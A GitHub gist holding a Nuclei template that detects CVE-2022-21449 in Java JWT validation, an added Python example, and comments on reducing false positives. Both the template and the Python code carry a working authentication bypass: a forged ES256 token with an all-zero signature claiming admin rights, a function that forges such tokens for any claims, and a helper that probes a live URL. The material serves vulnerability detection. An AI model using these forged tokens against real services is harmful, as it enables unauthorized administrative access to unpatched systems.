@righettod
Last active December 18, 2023 06:50
Nuclei template to detect exposure to CVE-2022-21449 through the JWT validation API in place.

```yaml
id: CVE-2022-21449

info:
  name: CVE-2022-21449 test exposure
  description: JDK 15 to 18 have a vulnerability in the validation of ECDSA signatures, so this template detects exposure to CVE-2022-21449 through the JWT validation API in place.
  author: righettod
  severity: info
  tags: cve,2022,java
  reference: https://neilmadden.blog/2022/04/19/psychic-signatures-in-java

requests:
  - raw:
      # First request: no credentials at all, expected to be refused.
      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: no-store
      # Second request: ES256 JWT with payload {"sub":"Rick Astley","admin":true,...}
      # and the DER signature SEQUENCE { INTEGER 0, INTEGER 0 } ("MAYCAQACAQA"),
      # which an affected JDK accepts under any public key.
      - |
        GET /?id={{randstr}} HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9.eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0.MAYCAQACAQA
        Cache-Control: no-store

    # Evaluate the matcher across both responses: exposed only when the
    # unauthenticated request is refused but the forged token is accepted.
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - '(status_code_1 == 403 || status_code_1 == 401) && status_code_2 == 200'
```
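The template hard-codes one token, so the following added example (not part of the gist, written here to show what the template relies on) builds the same "psychic" ES256 token for arbitrary claims, extracts the (r, s) pair from its signature, applies the range check that an affected JDK skipped, and reproduces the template's two-request verdict. The DER-encoded zero signature is what the gist's token carries; a verifier that expects the JWS raw r||s form needs 64 zero bytes instead, which the `der=False` path produces. The `probe()` helper and any target URL passed to it are assumptions for illustration; everything else runs offline.

```python
import base64
import json
import urllib.error
import urllib.request

# Order of the NIST P-256 group; r and s of a valid ES256 signature lie in [1, n-1].
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551

# Token carried by the template above: ES256 header, "Rick Astley" payload, and the
# DER-encoded signature SEQUENCE { INTEGER 0, INTEGER 0 } ("MAYCAQACAQA").
PAGE_TOKEN = (
    "eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiJ9."
    "eyJzdWIiOiJSaWNrIEFzdGxleSIsImFkbWluIjp0cnVlLCJpYXQiOjE2NTA0NjY1MDIsImV4cCI6MTkwMDQ3MDEwMn0."
    "MAYCAQACAQA"
)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def zero_signature(der: bool = True) -> bytes:
    """All-zero ECDSA signature: DER SEQUENCE of two INTEGER 0 (as in the gist's token),
    or the 64 zero bytes of the JWS raw r||s form."""
    return bytes([0x30, 0x06, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00]) if der else bytes(64)


def forge_psychic_jwt(claims: dict, der: bool = True) -> str:
    """Build an ES256 JWT with arbitrary claims and an all-zero signature.
    A JDK 15-18 verifier affected by CVE-2022-21449 accepts it under any public key."""
    header = {"typ": "JWT", "alg": "ES256"}
    segs = [b64url_encode(json.dumps(o, separators=(",", ":")).encode()) for o in (header, claims)]
    return ".".join(segs) + "." + b64url_encode(zero_signature(der))


def parse_der_ecdsa_signature(sig: bytes) -> tuple:
    """Minimal DER parser for SEQUENCE { INTEGER r, INTEGER s } (short-form lengths only)."""
    if len(sig) < 2 or sig[0] != 0x30 or sig[1] != len(sig) - 2:
        raise ValueError("not a short-form DER SEQUENCE")
    pos, ints = 2, []
    for _ in range(2):
        if pos + 2 > len(sig) or sig[pos] != 0x02:
            raise ValueError("expected DER INTEGER")
        length = sig[pos + 1]
        body = sig[pos + 2:pos + 2 + length]
        if len(body) != length:
            raise ValueError("truncated INTEGER")
        ints.append(int.from_bytes(body, "big"))
        pos += 2 + length
    if pos != len(sig):
        raise ValueError("trailing bytes after signature")
    return ints[0], ints[1]


def jwt_signature_components(token: str) -> tuple:
    """Extract (r, s) from the third JWS segment; accepts DER or the 64-byte raw form."""
    sig = b64url_decode(token.split(".")[2])
    if len(sig) == 64:
        return int.from_bytes(sig[:32], "big"), int.from_bytes(sig[32:], "big")
    return parse_der_ecdsa_signature(sig)


def signature_components_in_range(r: int, s: int, order: int = P256_ORDER) -> bool:
    """The check the vulnerable JDK skipped: r and s must both lie in [1, order-1].
    With r = 0 the verification equation degenerates and any key would 'verify'."""
    return 0 < r < order and 0 < s < order


def exposure_verdict(status_without_token: int, status_with_token: int) -> bool:
    """Mirror of the template's DSL matcher: exposed when the unauthenticated request
    is refused (401/403) but the forged token is accepted (200)."""
    return status_without_token in (401, 403) and status_with_token == 200


def probe(url: str, token: str = PAGE_TOKEN, timeout: float = 10.0) -> tuple:
    """Issue the template's two GETs against a live target (hypothetical URL supplied by
    the caller) and return both status codes for exposure_verdict()."""
    def status(extra_headers: dict) -> int:
        req = urllib.request.Request(url, headers={"Cache-Control": "no-store", **extra_headers})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code
    return status({}), status({"Authorization": "Bearer " + token})


if __name__ == "__main__":
    r, s = jwt_signature_components(PAGE_TOKEN)
    print("gist token: r=%d s=%d, in range: %s" % (r, s, signature_components_in_range(r, s)))
```

Running the block stand-alone shows that the gist's token decodes to r = 0, s = 0 and fails the range check; `exposure_verdict(*probe("https://target.example/"))` reproduces the template's matcher against a target of your choosing. Because the first request carries no token at all, the verdict still says nothing about endpoints that serve 200 to everyone, which is the false-positive case discussed in the comments below.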
@daffainfo

Need to add some matchers; if not, there will be many false positives.

@righettod (Author)

Yes, you are 100% right. It was a first proposal and I will refactor it to decrease the probability of false positives.

@righettod (Author)

@daffainfo I updated the template to try to decrease the probability of false positives:

[image]

@daffainfo

Looks so much better.

@righettod (Author)

Thank you.
